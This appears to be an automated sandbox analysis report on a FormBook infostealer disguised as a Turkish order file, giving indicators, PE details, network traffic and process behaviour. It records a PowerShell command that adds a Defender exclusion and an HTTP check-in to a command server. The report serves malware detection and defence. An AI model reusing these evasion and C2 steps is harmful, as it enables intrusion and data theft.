                    Behavior and APIs

                    TimeTypeDescription
                    11:50:54API Interceptor1x Sleep call for process: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe modified
                    11:50:56API Interceptor16x Sleep call for process: powershell.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    91.195.240.19Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeGet hashmaliciousFormBookBrowse
                    • www.fungusbus.com/dmjt/
                    Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exeGet hashmaliciousFormBookBrowse
                    • www.fungusbus.com/dmjt/
                    Att00173994.exeGet hashmaliciousFormBookBrowse
                    • www.fitfindrr.com/838k/
                    disjR92Xrrnc3aZ.exeGet hashmaliciousFormBookBrowse
                    • www.mantenopolice.com/mc10/?FPWhWLW=a7Q9lfqDygppgo6ZV30aZxePdataSOImfCiDXzHht2L4ahHGK8erugmBdeKHLdVYRCp3nMCDZQ==&AlB=8pdT8tsp
                    Attendance list.exeGet hashmaliciousFormBookBrowse
                    • www.gipsytroya.com/tf44/
                    Att0027592.exeGet hashmaliciousFormBookBrowse
                    • www.fitfindrr.com/838k/
                    1R50C5E13BU8I.exeGet hashmaliciousFormBookBrowse
                    • www.banyan.love/u44f/
                    Fiyat ARH-4532817-PO 45328174563.exeGet hashmaliciousFormBookBrowse
                    • www.fungusbus.com/dmjt/
                    Fiyat ARH-4532817-PO 45328174563.exeGet hashmaliciousFormBookBrowse
                    • www.fungusbus.com/dmjt/
                    KALIANDRA SETYATAMA PO 1310098007.exeGet hashmaliciousFormBookBrowse
                    • www.fungusbus.com/dmjt/

                    Domains

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    parkingpage.namecheap.comFiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeGet hashmaliciousFormBookBrowse
                    • 91.195.240.19
                    Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exeGet hashmaliciousFormBookBrowse
                    • 91.195.240.19
                    Att00173994.exeGet hashmaliciousFormBookBrowse
                    • 91.195.240.19
                    disjR92Xrrnc3aZ.exeGet hashmaliciousFormBookBrowse
                    • 91.195.240.19
                    Attendance list.exeGet hashmaliciousFormBookBrowse
                    • 91.195.240.19
                    Att0027592.exeGet hashmaliciousFormBookBrowse
                    • 91.195.240.19
                    #U0130#U015eLEM #U00d6ZET#U0130_524057699-1034 nolu TICAR_pdf (2).exeGet hashmaliciousFormBookBrowse
                    • 91.195.240.19
                    1R50C5E13BU8I.exeGet hashmaliciousFormBookBrowse
                    • 91.195.240.19
                    Fiyat ARH-4532817-PO 45328174563.exeGet hashmaliciousFormBookBrowse
                    • 91.195.240.19
                    Fiyat ARH-4532817-PO 45328174563.exeGet hashmaliciousFormBookBrowse
                    • 91.195.240.19

                    ASNs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    SEDO-ASDEfactura.exeGet hashmaliciousFormBookBrowse
                    • 91.195.240.12
                    Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeGet hashmaliciousFormBookBrowse
                    • 91.195.240.19
                    Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exeGet hashmaliciousFormBookBrowse
                    • 91.195.240.19
                    Att00173994.exeGet hashmaliciousFormBookBrowse
                    • 91.195.240.19
                    disjR92Xrrnc3aZ.exeGet hashmaliciousFormBookBrowse
                    • 91.195.240.19
                    Attendance list.exeGet hashmaliciousFormBookBrowse
                    • 91.195.240.19
                    8hd98EhtIFcYkb8.exeGet hashmaliciousFormBookBrowse
                    • 91.195.240.123
                    Bn0VHqJWSS.exeGet hashmaliciousUnknownBrowse
                    • 91.195.240.117
                    gZVfHNoTGQ.exeGet hashmaliciousUnknownBrowse
                    • 91.195.240.117
                    Bn0VHqJWSS.exeGet hashmaliciousUnknownBrowse
                    • 91.195.240.117

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.log

                    Download File
                    Process:C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):1216
                    Entropy (8bit):5.34331486778365
                    Encrypted:false
                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                    Malicious:true
                    Reputation:high, very likely benign file
                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                    Download File
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1172
                    Entropy (8bit):5.3550249375369265
                    Encrypted:false
                    SSDEEP:24:3OWSKco4KmZjKbmOIKod6emN1s4RPQoU99t7J0gt/NKIl9iagu:eWSU4xympjms4RIoU99tK8NDv
                    MD5:F5C607E507119C024A8457EB53A4EACA
                    SHA1:E12BA3AFFE22D4699D53BBBFB38281EB20C79523
                    SHA-256:B5C5E419F4854F669A4DF47860787886BC46FAC9C6DC97E39A9F118E79F55AEF
                    SHA-512:1FA5B1E2F4850B41ED89237D6A2A5FBB7A04101B21362F118D39A4C9891F00F605AA49651DD1B5B37CFA954BD7A08A53F00F7ECAE4966ADA2207AD2DF995B597
                    Malicious:false
                    Reputation:low
                    Preview:@...e................................................@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                    C:\Users\user\AppData\Local\Temp\3y36225

                    Download File
                    Process:C:\Windows\SysWOW64\shutdown.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                    Category:dropped
                    Size (bytes):196608
                    Entropy (8bit):1.1221538113908904
                    Encrypted:false
                    SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
                    MD5:C1AE02DC8BFF5DD65491BF71C0B740A7
                    SHA1:6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
                    SHA-256:CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
                    SHA-512:01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dnyr5qzu.vgw.psm1

                    Download File
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.038920595031593
                    Encrypted:false
                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ifwwgjla.qvu.psm1

                    Download File
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.038920595031593
                    Encrypted:false
                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_plapwhs1.hgt.ps1

                    Download File
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.038920595031593
                    Encrypted:false
                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wjd2pqcm.m1p.ps1

                    Download File
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.038920595031593
                    Encrypted:false
                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                    Static File Info

                    General

                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Entropy (8bit):7.951626051712124
                    TrID:
                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                    • Win32 Executable (generic) a (10002005/4) 49.75%
                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                    • Windows Screen Saver (13104/52) 0.07%
                    • Generic Win/DOS Executable (2004/3) 0.01%
                    File name:03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe
                    File size:989'696 bytes
                    MD5:22f3e4a1d074aec6cbc7314efd0f53e0
                    SHA1:169c6970364d5f8b75efe451a38d7a91b1b47f6b
                    SHA256:2d6eb4f35570a71972008b6f1e3572aaab6d0ef97e19c42dbc68aeb57b670964
                    SHA512:81038105db28db336e2446d4210e76dbcc578640cfe72e24e85355518a3eb23498c99a9a15a311e4e2ba31cd5a69f1db0d0d723e255139a98821aaa73b8b7907
                    SSDEEP:24576:6bkynDESWY4vQ+P3zR+L1CMCowXu/3mmo3AMF9wfHrh:6I8DE/7vPcL1HCowX8mmo3A9jh
                    TLSH:2A25230325A8CB60C87E9FFD8579465013B0BC2D1971D59E6EC6B4FFA9B1B90402AB37
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._...............0......f........... ........@.. ....................................@................................

                    File Icon

                    Icon Hash:66666667e69c310e

                    Static PE Info

                    General

                    Entrypoint:0x4ed1e2
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Time Stamp:0xB95FCE0F [Sat Jul 21 02:33:51 2068 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:4
                    OS Version Minor:0
                    File Version Major:4
                    File Version Minor:0
                    Subsystem Version Major:4
                    Subsystem Version Minor:0
                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                    Entrypoint Preview

                    Instruction
                    jmp dword ptr [00402000h]
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al

                    Data Directories

                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0xed1900x4f.text
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xee0000x6400.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xf60000xc.reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG0xeb4700x70.text
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                    Sections

                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x20000xeb1e80xeb2003e2d25cc67857f8604400642c88dde9eFalse0.9724672713981924data7.978509985045748IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .rsrc0xee0000x64000x640060688ca311bbe7ec82333c57930e69d2False0.395703125data5.148026062429349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .reloc0xf60000xc0x200af87c6d498fa46fabfae3fe9292e52f5False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                    Resources

                    NameRVASizeTypeLanguageCountryZLIB Complexity
                    RT_ICON0xee1e00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 00.2701612903225806
                    RT_ICON0xee4d80x128Device independent bitmap graphic, 16 x 32 x 4, image size 00.4966216216216216
                    RT_ICON0xee6100xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.5439765458422174
                    RT_ICON0xef4c80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.6656137184115524
                    RT_ICON0xefd800x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5021676300578035
                    RT_ICON0xf02f80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.3157676348547718
                    RT_ICON0xf28b00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.4090056285178236
                    RT_ICON0xf39680x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.5859929078014184
                    RT_GROUP_ICON0xf3de00x76data0.6440677966101694
                    RT_VERSION0xf3e680x398OpenPGP Public Key0.4217391304347826
                    RT_MANIFEST0xf42100x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                    Imports

                    DLLImport
                    mscoree.dll_CorExeMain

                    Network Behavior

                    Snort IDS Alerts

                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                    07/03/24-17:52:48.068224TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24971580192.168.2.991.195.240.19

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Jul 3, 2024 17:52:48.055138111 CEST4971580192.168.2.991.195.240.19
                    Jul 3, 2024 17:52:48.060219049 CEST804971591.195.240.19192.168.2.9
                    Jul 3, 2024 17:52:48.060352087 CEST4971580192.168.2.991.195.240.19
                    Jul 3, 2024 17:52:48.068223953 CEST4971580192.168.2.991.195.240.19
                    Jul 3, 2024 17:52:48.073056936 CEST804971591.195.240.19192.168.2.9
                    Jul 3, 2024 17:52:48.747432947 CEST804971591.195.240.19192.168.2.9
                    Jul 3, 2024 17:52:48.748835087 CEST804971591.195.240.19192.168.2.9
                    Jul 3, 2024 17:52:48.748923063 CEST4971580192.168.2.991.195.240.19
                    Jul 3, 2024 17:52:48.780905008 CEST4971580192.168.2.991.195.240.19
                    Jul 3, 2024 17:52:48.785737991 CEST804971591.195.240.19192.168.2.9

                    UDP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Jul 3, 2024 17:52:37.488508940 CEST6457753192.168.2.91.1.1.1
                    Jul 3, 2024 17:52:37.501432896 CEST53645771.1.1.1192.168.2.9
                    Jul 3, 2024 17:52:42.510727882 CEST5162853192.168.2.91.1.1.1
                    Jul 3, 2024 17:52:42.814138889 CEST53516281.1.1.1192.168.2.9
                    Jul 3, 2024 17:52:47.825834990 CEST5946353192.168.2.91.1.1.1
                    Jul 3, 2024 17:52:48.043201923 CEST53594631.1.1.1192.168.2.9

                    DNS Queries

                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Jul 3, 2024 17:52:37.488508940 CEST192.168.2.91.1.1.10xf3adStandard query (0)www.betful.siteA (IP address)IN (0x0001)false
                    Jul 3, 2024 17:52:42.510727882 CEST192.168.2.91.1.1.10xbebcStandard query (0)www.deviexp.comA (IP address)IN (0x0001)false
                    Jul 3, 2024 17:52:47.825834990 CEST192.168.2.91.1.1.10xde1bStandard query (0)www.fungusbus.comA (IP address)IN (0x0001)false

                    DNS Answers

                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Jul 3, 2024 17:52:37.501432896 CEST1.1.1.1192.168.2.90xf3adName error (3)www.betful.sitenonenoneA (IP address)IN (0x0001)false
                    Jul 3, 2024 17:52:42.814138889 CEST1.1.1.1192.168.2.90xbebcServer failure (2)www.deviexp.comnonenoneA (IP address)IN (0x0001)false
                    Jul 3, 2024 17:52:48.043201923 CEST1.1.1.1192.168.2.90xde1bNo error (0)www.fungusbus.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                    Jul 3, 2024 17:52:48.043201923 CEST1.1.1.1192.168.2.90xde1bNo error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false

                    HTTP Request Dependency Graph

                    • www.fungusbus.com

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.94971591.195.240.19806492C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe
                    TimestampBytes transferredDirectionData
                    Jul 3, 2024 17:52:48.068223953 CEST480OUTGET /ucdm/?j2=EKdombQUikql/e8x5w/b0WRCZZ7GjewvGt5yqJ62oMuwgaHfKWbffkwAJSwjzlHKlyNbdgTciiNebF1Tnxx1ssE7dAszzRsyY0LYOFUjrmAhIYA2gw==&NbL=5XSdkb2PqtnPh8PP HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Host: www.fungusbus.com
                    Connection: close
                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2483.0 Safari/537.36
                    Jul 3, 2024 17:52:48.747432947 CEST208INHTTP/1.1 403 Forbidden
                    content-length: 93
                    cache-control: no-cache
                    content-type: text/html
                    connection: close
                    Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Target ID:0
                    Start time:11:50:54
                    Start date:03/07/2024
                    Path:C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe"
                    Imagebase:0x930000
                    File size:989'696 bytes
                    MD5 hash:22F3E4A1D074AEC6CBC7314EFD0F53E0
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low
                    Has exited:true

                    General

                    Target ID:3
                    Start time:11:50:55
                    Start date:03/07/2024
                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe"
                    Imagebase:0xf30000
                    File size:433'152 bytes
                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:4
                    Start time:11:50:55
                    Start date:03/07/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff70f010000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:5
                    Start time:11:50:55
                    Start date:03/07/2024
                    Path:C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe"
                    Imagebase:0xb90000
                    File size:989'696 bytes
                    MD5 hash:22F3E4A1D074AEC6CBC7314EFD0F53E0
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2213669414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2213669414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2214051577.0000000001250000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2214051577.0000000001250000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2215409822.0000000001AF0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2215409822.0000000001AF0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                    Reputation:low
                    Has exited:true

                    General

                    Target ID:12
                    Start time:11:52:17
                    Start date:03/07/2024
                    Path:C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe"
